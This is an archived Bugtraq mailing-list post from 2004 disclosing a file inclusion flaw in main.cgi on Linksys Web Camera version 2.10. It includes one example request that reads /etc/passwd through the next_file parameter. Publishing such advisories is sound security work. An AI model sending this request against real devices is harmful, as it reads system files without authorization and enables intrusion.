[35187] in bugtraq
Linksys Web Camera File Inclusion Vuln
daemon@ATHENA.MIT.EDU (John Doe)
Tue Jun 8 07:16:03 2004
Date: 7 Jun 2004 03:34:24 -0000
Message-ID: <20040607033424.17823.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: John Doe <scriptX_@hotmail.com>
To: bugtraq@securityfocus.com
Linksys Web Camera version 2.10 (only tested with 2.10) is vulnerable to a file inclusion vulnerability in main.cgi
Example: http://www.host.com/main.cgi?next_file=/etc/passwd